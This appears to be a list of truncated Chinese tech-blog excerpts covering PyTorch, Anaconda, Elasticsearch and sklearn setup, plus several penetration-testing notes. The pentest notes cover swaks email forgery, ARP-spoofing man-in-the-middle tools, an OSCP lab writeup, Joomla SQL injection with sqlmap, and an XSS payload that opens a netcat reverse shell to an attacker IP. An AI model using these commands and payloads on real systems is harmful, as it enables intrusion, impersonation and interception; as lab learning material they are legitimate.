Pytorch官网教程学习笔记 这里写目录标题注:还在学习中,会继续维护一、入门语法1.1、创建张量1.1.1使用python基础数据结构创建张量(torch会自动推测元素的数据类型)1.1.2使用numpy数组创建张量1.1.3使用一个张量的参数来创建一个新的张量1.1.4使用一个元组数据结构的数据来指定张量的维度(维度里面一个数字代表一个维度)1.2张量的属性(Attributes)1.3操作张量(张量的运算)1.3.1张量的切片和下标索引操作1.3.2张量的拼接操作1.4张量地算法操作1.4.1矩阵乘法1.4.2元素乘法1.5单元素
anaconda+pytorch+jupter+pycharm安装 这里写目录标题一、更改anaconda镜像源。二、创建虚拟环节,并进入虚拟换三、安装gpu版本的pytorch。四、安装jupter notebook五、pytorch离线包下载地址一、更改anaconda镜像源。我用anaconda来创建不同的python环境,每个环节相互独立,互不影响。建议不要安装再C盘,因为后面安装虚拟环境比较废硬盘空间,建议anaconda安装在空间较达的分区中。conda config --add channels https://mirrors.tuna.tsinghu
springboot+elasticsearch+ik+logstash实现搜索功能(elasticsearch数据库用于查询,mysql数据库用于修改数据,logstash用于同步数据,ik做分词) 这里写目录标题1.0、软件准备2.1、elasticsearch分布式安装2.1.1、解压以后修改配置文件/config/elasticsearch.yml2.1.2、安装ik2.1.3、启动2.2、安装logstash2.2.1、安装mysql驱动2.2.2、创建jdbc.conf和jdbc.sql放在更目录下/jdbc.conf和/jdbc.sql2.3、springboot整合elasticsearch2.3.1、引入依赖2.3.2、配置ElasticSearch客户端ElasticSearchCli
sklearn代码查询(学习笔记) 这里写目录标题决策数画学习曲线决策数from sklearn import treefrom sklearn.model_selection import train_test_split#划分训练集和测试集Xtrain,Xtest,Ytrain,Ytest = train_test_split(wine.data,wine.target,test_size=0.3)#实例化模型并训练clf = tree.DecisionTreeClassifier(criterion="entropy
决策树&回归树 决策数决策数的核心类容sklearn中的决策树sklearn训练流程决策树分类器DecisionTreeClassifier决策数的核心类容1:如何确定最佳节点和最佳分支2:决策数什么时候停止生长(防止过拟合)sklearn中的决策树sklearn训练流程from sklearn import tree #导入需要的模块clf = tree.DecisionTreeClassifier() #实例化clf = clf.fit(x_train,y_train) #训练
anaconda3 安装anaconda3下载并安装新建一个环境并安装JUPYTER配置jupyter下载并安装anaconda仓库:https://repo.anaconda.com/archive/wget https://repo.anaconda.com/archive/Anaconda3-2019.03-Linux-x86_64.shbash Anaconda3-2019.03-Linux-x86_64.sh#配置环境变量conda路径加入到 .bashrc 中vim ~/.bashrcexp
kali邮件发送 伪造邮件发送swaks工具伪造邮件发送swaks工具伪造邮件发送#发送一条信息swaks --body "内容" --header "Subject:标题" -t xxxxx@qq.com -f "admin@local.com"#测试是否能够连接swaks -q rcpt -t 邮件地址-t –to 目标地址 -t test@test.com-f –from 来源地址 (发件人) -f "text<text@text.com>"-h –helo 邮件头(不明)–body
局域网渗透测试篇 局域网渗透测试篇-链接上wifi以后的骚操作中间人攻击arpspoof&&driftnet篇driftnet软件参数详解ettercap进行arp攻击mitmf注入脚本(XSS)kali使用密文直接登录pth-winexe工具中间人攻击arpspoof&&driftnet篇arpspoof详解#安装dsniff(arpspoof是dsniff集成的一个工具)和driftnetapt-get install dsniffapt-get install driftne
vulhub上oscp InfoSec靶机渗透测试writeup 这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
清理linux垃圾 这里写目录标题sudo apt-get [clean|automove|autoclean|purge|remove]1:clean 命令删除所有的软件安装包2:autoclean 命令删除过时的安装包3:remove 命令删除特定软件4:用purge 命令删除软件“残余”5:autoremove 命令删除不再需要的依赖软件包sudo apt-get [clean|automove|autoclean|purge|remove]1:clean 命令删除所有的软件安装包apt-get clean 2
渗透测试思路总结 这里写目录标题访问受限域名访问限制反弹shellxss漏洞中的反弹shell军刀中的反弹shell获取用户名和密码提权软件漏洞提权系统漏洞提权访问受限域名访问限制解决方案一:添加域名解析vim hosts10.10.10.209 doctors.htb反弹shellxss漏洞中的反弹shell<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>军刀
Joomla漏洞利用 这里写目录标题漏洞扫描Joomla3.7.0有一个sql注入漏洞Join hash文件登陆Joomla管理控制台以后的利用蚁剑链接,反弹shell提权漏洞扫描joomscan -u http://192.168.1.24/Joomla3.7.0有一个sql注入漏洞//--dbs 可变参数部分,通过更改这个参数来获取数据库,表,用户密码sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout